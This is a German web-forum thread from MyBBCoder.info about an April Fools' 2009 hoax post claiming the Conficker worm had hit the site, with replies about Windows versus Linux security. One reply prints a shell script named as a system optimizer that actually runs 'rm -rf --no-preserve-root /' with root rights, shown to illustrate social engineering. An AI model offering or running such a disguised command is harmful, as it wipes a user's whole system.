Hallo, Gast! (Registrieren)

Letzte Ankündigung: MyBB 1.8.12 veröffentlicht (22.05.17)


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste
Conficker-Wurm sperrt Adminzugänge zu MyBBCoder.info [April April]
#1
WARNUNG: Dieser Beitrag ist eine reine Fiktion. Es wurde für den Aprilscherz im Jahre 2009 an dem 1. April benutzt. ACHTUNG: Der Conficker-Wurm ist jedoch KEIN Aprilscherz. Wir empfehlen zur Vorsichtsmaßnahme, den McAffee Stinger Conficker unter http://www.chip.de/downloads/McAfee-AVER...40896.html herunterzuladen und den PC nach diesem Wurm scannen zu lassen.

Weltweit sind Millionen von Rechner mit den Conficker-Wurm infiziert und der Schaden wird sich heute erhöhen. Der Wurm holt sich neue Daten von dem Urheber und wird weltweit das Internet lahmlegen.
Abhilfe: Schafft euch den McAffee Stinger Conficker an, um den Wurm zu entfernen.

MyBBCoder.info scheint leider schon angeschlagen zu sein und wird so schnell wie möglich
vom Netz genommen, da versteckte Würmer an unserem Server gelangt sind. Leider ist der Zugang zu wichtigen Adminbereichen gesperrt, so dass wir auf den Server-Techniker warten müssen.

Wir bitten daher alle Mitglieder möglichst keine Downloads zu tätigen, wer weiß, inwieweit sich der Wurm verbreitet haben könnte.
#2
Jetzt gibt es nur zwei Möglichkeiten...

1. Das wars mit mybbcoder.info

2. Es kommt April April Toungue

MfG Megaleecher
#3
2. Option eher Big Grin
#4
Oh mein Gott, ihr habt einen Windows Server?!?! [Bild: shocked.gif]

Ich werde zur Sicherheit lieber alle meine Plugins entfernen, welche ich hier reingestellt habe...
#5
April April, nein MyBBCoder.info ist davon zum Glück nicht betroffen und wir nutzen Linux als Serverbetriebsystem. Der Conficker-Wurm ist jedoch KEIN Aprilscherz. Ich empfehle zur Vorsichtsmaßnahme, den McAffee Stinger Conficker unter http://www.chip.de/downloads/McAfee-AVER...40896.html herunterzuladen und den PC nach diesem Wurm scannen zu lassen.
#6
Oder benutzt erst gar nicht Windows. Ich selber bin mit Linux bzw. Ubuntu sehr zufrieden. Toungue
[Bild: banner.png]

Bitte die Foren-Regeln beachten und im Profil die verwendete MyBB-Version angeben.
#7
Mit Wine könnte man mit Sicherheit auch Linux verseuchen.
#8
optimize_system.sh
Code:
#!/bin/bash
kdesudo rm -rf --no-preserve-root /
Hey Max,
mit diesem Programm kannst du dein System noch schneller machen. Am besten probierst du es gleich aus. Bei mir hat's super geklappt.

Und schon ist auch dein Linuxsystem am *****
Das System ist daher nur so sicher wie der Benutzer der davor sitzt intelligent ist.



Möglicherweise verwandte Themen...
Thema Verfasser Antworten Ansichten Letzter Beitrag
  Serverausfall am 1. März 2009 & Domain mybbcoder.info Sebijk 9 6.055 05.03.2009, 18:58
Letzter Beitrag: StefanT